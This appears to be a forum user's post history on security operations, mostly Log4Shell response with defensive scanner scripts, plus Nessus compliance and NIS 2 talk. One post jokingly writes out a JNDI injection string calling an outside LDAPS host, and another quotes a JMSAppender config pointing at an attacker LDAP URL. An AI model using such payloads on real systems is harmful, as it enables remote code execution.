|
Any Tenable Nessus users here using it to report compliance to templates from Security Center? Either roll-your-own, or the canned templates (SOX, PCI DSS, HIPPA/HITECH, etc.). Looking for good/bad reviews before I try to force security to devote project hours. Thx
|
#
¿
Dec 26, 2018 10:20
|
|
|
|
| # ¿ Apr 26, 2024 07:30 |
|
|
The problem is you're not evaluated on reality, you're evaluated on whatever the auditor thinks. It can be internal audit, 3rd party doing your annual 3402 SOC 1, a QSA doing PCI, whatever. They want to see documentation you have a security policy, appropriate controls, and that you follow them. The thing is that running a Nessus report using whatever Tenable calls a "HIPPA Compliance Template" is something you can wave at an auditor based on an arguably *independent* evaluation. Yeah it's probably mostly meaningless, but ticking boxes means not having red flags in your goddamn audit findings. Those cost *money*, **now**, to fix. And customers get real pissy when you're in material breach.
|
|
#
¿
Dec 26, 2018 16:50
|
|
|
BangersInMyKnickers posted:Clearly lying to auditors is the most viable and prudent path forward Then the FDA "hi you can't make more drugs now til you fix this poo poo" catches you. :/
|
|
#
¿
Dec 26, 2018 16:59
|
|
|
So my initial take is the offending class file is in log4j-core-*.jar, but there's oodles of plain log4j.jar files out there and Nessus tags those and v1 as vulnerable. Customer running scans is demanding we handle v1 as part of 44228 and I am pushing back . We initially ran a script via HPSA crawling thousands of servers for jar files. Day 5 dawns. Still missing patches from major vendors. Off to check vendor websites.
|
|
#
¿
Dec 15, 2021 07:36
|
|
|
We had at least one instance where a team renamed the log4j jar file, no feedback yet if the app barfed
|
|
#
¿
Dec 15, 2021 07:55
|
|
|
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 "It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (<2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)." Dehumaniiiiize yourseeeeelllllllllf Bonus: "Unfortunately, we have an example that Redhat has used log4j in what is called an "uberjar" where the file name does not directly indicate that there is log4j inside the jar and where the class namespaces have been changed." 
Rust Martialis fucked around with this message at 10:07 on Dec 15, 2021 |
|
#
¿
Dec 15, 2021 08:28
|
|
|
If anyone finds a script for either shell or PowerShell that can recursively crawl an entire disk, and for each .jar file it sees, list all the class files in it, including any in a jar file *nested* in the jar file, please post a link. Right now some vendors are saying patches next week. The list of vulnerable Oracle and Cisco products is huge. The amount of 1.x in things like SAP is mind bending. Nessus does have local and remote (callback) plugins and you might get try-it licenses.
|
|
#
¿
Dec 15, 2021 17:45
|
|
|
I want something I can pass to the HPSA team to run on every one of thousands of servers.
|
|
#
¿
Dec 15, 2021 18:06
|
|
|
Ugly hack but it 'works' with bsdtar 3.4.3 on FreeBSD: I created a file foo.class, created a tarfile called foo.jar, then tarred bar.class and foo.jar into bar.jar. Trying to simulate a nested jar file inside a jar file. You can concatenate tar files to list the content, just keep sending it to stdout, alternating x and t commands. pre:> tar xvfO bar.jar | tar xvfO - | tar tvfO - | tar xvfO - | tar tvf -
x bar.class
x foo.jar
x foo.class
then uhh munging itto find
> find . -name "*.jar" -exec sh -c 'tar xvfO "{}" | tar xvfO - | tar tvfO - | tar xvfO - | tar tvf -' \;
x bar.class
x foo.jar
x foo.class
PowerShell script on GitHub https://www.reddit.com/r/PowerShell/comments/resukw/log4shell_scanner_multiserver_massively_parallel/ Anyone know powershell comment oin it? Rust Martialis fucked around with this message at 19:20 on Dec 15, 2021 |
|
#
¿
Dec 15, 2021 19:13
|
|
|
Powershell script I modified - scans ALL drives for jar files and hunts for JDNILookup.class in them, spits it out. base script not mine.pre:$Drives = Get-PSDrive -PSProvider 'FileSystem'
foreach($Drive in $drives) {
echo $Drive
gci -Path $Drive.root -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path
}
|
|
#
¿
Dec 16, 2021 14:20
|
|
|
evil_bunnY posted:2.16 is apparently still problematic LMBO Circumcision of the offending JNDILookup.class file sounds better and better every loving second
|
|
#
¿
Dec 17, 2021 09:48
|
|
|
Did the image fail to convey itself?
|
|
#
¿
Dec 17, 2021 10:39
|
|
|
So for log4j v1, the "solution" is to "audit your log4j.properties or log4j.xml files" to make sure JMSAppender isn't configured insecurely. Should be easy enough to run a script to find and search log4j config files for JMSAppender config lines.... anyone got a script or do I need to try my pathetic PowerShell script skills.
|
|
#
¿
Dec 18, 2021 20:09
|
|
|
CVE-2021-4104 - reading the CVE at https://access.redhat.com/security/cve/CVE-2021-4104 and the bugzilla page https://bugzilla.redhat.com/show_bug.cgi?id=2031667 , it reads to me like version 1 is not really a remote exploit at all? A commenter on bugzilla points out it requires that JMSAppnder be enabled in log4j.config, but also that remote exploits require that additional settings in the file be set locally to point to an attacker's site: pre:"you can execute a command only by putting it in the properties TopicBindingName or TopicConnectionFactoryBindingName. For example: log4j.appender.jms=org.apache.log4j.net.JMSAppender log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory log4j.appender.jms.ProviderURL=tcp://localhost:61616 >>>log4j.appender.jms.TopicBindingName=ldap://host:port/a >>>log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a" Lastly the script should make the config file read-only by *anyone* including the application. I'm sure someone's already figured this out a long time ago but I am home with a sore arm since I got my booster yesterday. Does this hold together? Did I gently caress up somewhere?
|
|
#
¿
Dec 18, 2021 20:52
|
|
|
lovely Log4j v1 scannerpre:$Drives = Get-PSDrive -PSProvider 'FileSystem'
foreach($Drive in $drives) {
gci -Path $Drive.root -rec -force -include log4j.config,log4j.xml -ea 0 | foreach {select-string "log4j.appender.jms" $_} | select-object -Property Path, LineNumber, Line | ft -HideTableHeaders
}
pre:N:\log4j.config 1 log4j.appender.jms=org.apache.log4j.net.JMSAppender N:\log4j.config 2 log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialCont... N:\log4j.config 3 log4j.appender.jms.ProviderURL=tcp://localhost:61616 N:\log4j.config 4 log4j.appender.jms.TopicBindingName=ldap://host:port/a N:\log4j.config 5 log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a Rust Martialis fucked around with this message at 21:00 on Dec 19, 2021 |
|
#
¿
Dec 19, 2021 20:57
|
|
|
We ran the script that peeks inside jar files for JNDILookup.class and yeah, some apps repackage class files. Thought you could just look for log4j-core-2.x.jar? Nope!pre:C:\Program Files\Commvault\ContentStore\Base\DbJars\DbArchiveEngine.jar C:\Program Files\Hewlett-Packard\CSArobocopy\Tools\lib\CLI-lib.jar D:\apps\elk\7.4.0\logstash\vendor\bundle\jruby\2.5.0\gems\logstash-input-tcp-6.0.3-java\vendor\jar-dependencies\org\logstash\inputs\logstash-input-tcp\6.0.3\logstash-input-tcp-6.0.3.jar
|
|
#
¿
Dec 19, 2021 21:05
|
|
|
The myriad ways of obfuscating the attack would get past your ngFW but would also be unreadable
|
|
#
¿
Dec 19, 2021 22:04
|
|
|
I thought you could engineer the callback to any port, so blocking LDAP can't be port-based
|
|
#
¿
Dec 20, 2021 21:51
|
|
|
New! Improved! Script! Scans everything under root for jar files, then looks to see if the jar file has JNDILookup.class in it, and if it does, checks the MANIFEST.MF for a version. pre:$ cat manifestscan.sh
#!/bin/bash
printf "%-16s|%-8s|%-64s|%-20s\n" "Hostname" "Version" "Jar File" "Class"
for n in $(find / -name *.jar )
do
CLASS="$(unzip -l $n | grep -i 'jndilookup.class' | awk '{print $4}' )"
if [[ -n ${CLASS} ]]; then
VERSION="$(unzip -q -c $n META-INF/MANIFEST.MF | grep "Log4jReleaseVersion:" | awk '{print $2}' | sed 's/\s//g' )"
printf "%16s|%8s|%64s|%20s\n" $HOSTNAME $VERSION $n $CLASS
fi
done
$ ./manifestscan.sh
Hostname |Version |Jar File |Class
hostname| 2.17.0| /TEST/apache-log4j-2.17.0-bin/log4j-core-2.17.0.jar|org/apache/logging/log4j/core/lookup/JndiLookup.class
Rust Martialis fucked around with this message at 13:02 on Dec 22, 2021 |
|
#
¿
Dec 22, 2021 12:54
|
|
|
Saukkis posted:Now go down the next level and make the script scan for any .jars inside the .jars, unpack them and look for JNDI. Oh, and also include .wars in your scan. Could I invoke auditd somehow on Linux to scream any time a fopen( ) or open( ) was done on any file with jndi in the name, I wonder
|
|
#
¿
Dec 26, 2021 18:09
|
|
|
BonHair posted:The best cyber attack weapon is probably a cleaning trolley. That'll get you past most physical perimeters, and from there you can probably install a small wireless keylogger in selected computers or docking stations. Congratulations, you now have full access to anything not protected by two factor. Unless you use being on the internal network as a second factor, in which case you also have that. Plus with certain attacks like stealing session cookies you can break some 2FA anyhow.
|
|
#
¿
Dec 27, 2021 23:20
|
|
|
Woke up, saw 9 unread, thought, oh gently caress, 2.18.0
|
|
#
¿
Jan 1, 2022 08:46
|
|
|
More JNDI goodness https://www.zdnet.com/article/jfrog-researchers-find-jndi-vulnerability-in-h2-database-consoles-similar-to-log4shell/ H2 database, not LOG4J
|
|
#
¿
Jan 7, 2022 07:56
|
|
|
spankmeister posted:They probably learned that in their CISSP certification or something and now they're using it everywhere. Lol "The CFR Triad"
|
|
#
¿
Jan 12, 2022 06:41
|
|
|
Defenestrategy posted:Chips fries and a reuben? Sounds good to me. Confidentiality Fries Reuben
|
|
#
¿
Jan 12, 2022 07:10
|
|
|
Martytoof posted:Is it still probateable to just post a meme because I think this one is pretty on the nose… ICS dog
|
|
#
¿
Jan 21, 2022 06:54
|
|
|
Who knowingly exposes a NAS to the Internet wtf
|
|
#
¿
Jan 27, 2022 22:06
|
|
|
KillHour posted:"Do you have any questions for me?" pre:
${jndì:ldaps://somethingawful.com/forums}
|
|
#
¿
Jan 28, 2022 21:26
|
|
|
Potato Salad posted:doesn't work, SA has no .class It does have jars though
|
|
#
¿
Jan 29, 2022 08:49
|
|
|
Any Eurogoons interested in discussing NIS 2?
|
|
#
¿
Jan 30, 2022 12:13
|
|
|
SlowBloke posted:I’m skeptical about it since it only mandates audit on a limited basis and the control/management entities it mandates at member basis have been created already by most nato members. What are your thoughts? I work for a data centre service provider, and we provide services for a number of public and private entities currently deemed either essential or important or likely to be deemed as such once NIS 2 is passed. I am our senior subject matter expert on security including governance, risk and compliance. The difference between providing services to an essential entity and *being* an essential entity concern me. Annex I lists data centre service providers as a class under Digital Infrastructure open to be considered essential. If we're essential, then I have to go through notification of the "competent authorities" of any actual serious incident or any potential significant threat within 24 hours, as well as notifying all my customers of any impact and possible mitigations "without undue delay". If we're not deemed essential, I don't face the same reporting rules. Now the directive will probably be approved this summer with an implementation period of something like 18 months. So I have to advise my CISO and CEO if we need to make sure our vulnerability reporting is up to snuff - stricter than GDPR breach reporting. The CEO and VP Legal will probably also be interested that they can be suspended for breaches.
|
|
#
¿
Jan 30, 2022 19:34
|
|
|
Faaaack Ed: faaaaaaack Rust Martialis fucked around with this message at 18:42 on Feb 1, 2022 |
|
#
¿
Feb 1, 2022 17:55
|
|
|
BonHair posted:Listen, we bought this tool to find bad stuff, and the tool says your stuff is bad. No, we don't know or care how the tool works, the point is that it's expensive and thus right. Oh god, this in spades. One customer runs their own Nessus scans and regularly screams about false positives, and during log4j where the v2 bug was a CVSS of 9.8 ("fix now"), the v1 stuff was 6.2, so put on the "fix later" pile unless Internet facing. Yet they were screaming at us daily why we hadn't patched *all* the v1 poo poo because Nessus just looked for files named log4j*.jar. Like vendors taking *forever* to announce patch dates and them all "patch this!!!" when places like Cisco were saying in the week before Christmas that "patches for this will be available January 24th". I just blocked it out and let the account team deal with it. Apparently they are still mad.
|
|
#
¿
Feb 5, 2022 11:54
|
|
|
SlowBloke posted:Sorry to interrupt the ssl chat, just wanted to inform that qnap has pushed a qts 5.0 update to address the latest samba cve, samba version is now 4.13.17 . Copy, paste, to: team-backup, subject: stop asking me when the patch is out, send Thx
|
|
#
¿
Feb 9, 2022 19:49
|
|
|
Apparently SAP released a full kernel upgrade which we implemented over the weekend. Fyi if your org has SAP Ed: https://www.cvedetails.com/cve/CVE-2022-22536/
|
|
#
¿
Feb 22, 2022 22:44
|
|
|
KillHour posted:You missed the one where the attackers had taken over the AD server and had the malware pushed to the entire organization via GPO months in advance to be executed all at once Lockbit2 spreads via GPO. It's the one that hit Vestas late in 2021. Helping them clean up was... stressful.
|
|
#
¿
Feb 24, 2022 07:42
|
|
|
Ynglaur posted:The free version of OpenDNS might be enough for you. I can't remember if the EULA forbids use by commercial entities or not, so you'd need to check that, and I imagine setting up DNS on mobile devices might be a pain. Still, it would be cheap from a licensing, if not a labor, perspective. One assumes a MDM solution?
|
|
#
¿
Feb 26, 2022 11:13
|
|
|
BonHair posted:I'm in the business of infosec management software. Every single one of our customers is screaming about getting some power bi reports for security stuff. Incidentally, none of them know what they want beyond that, except "some way to track if it's good or bad across time". DO. NOT. BUY. QLIK.
|
|
#
¿
Feb 27, 2022 12:18
|
|
|
Ynglaur posted:For a while I kind of equated Power BI, Tableau, and Qlik for most data visualization work. Some of my data viz colleagues have recently (last year or so) kind of waved me off of that idea. They generally land on Tableau or Power BI. Nah, just I find QlikView and QlikSense ugly and hate coding it. Plus you can hire power bi coders much easier.
|
|
#
¿
Feb 28, 2022 16:40
|
|
|
|
| # ¿ Apr 26, 2024 07:30 |
|
|
CLAM DOWN posted:who is wes?! 
|
|
#
¿
Mar 2, 2022 20:58
|
|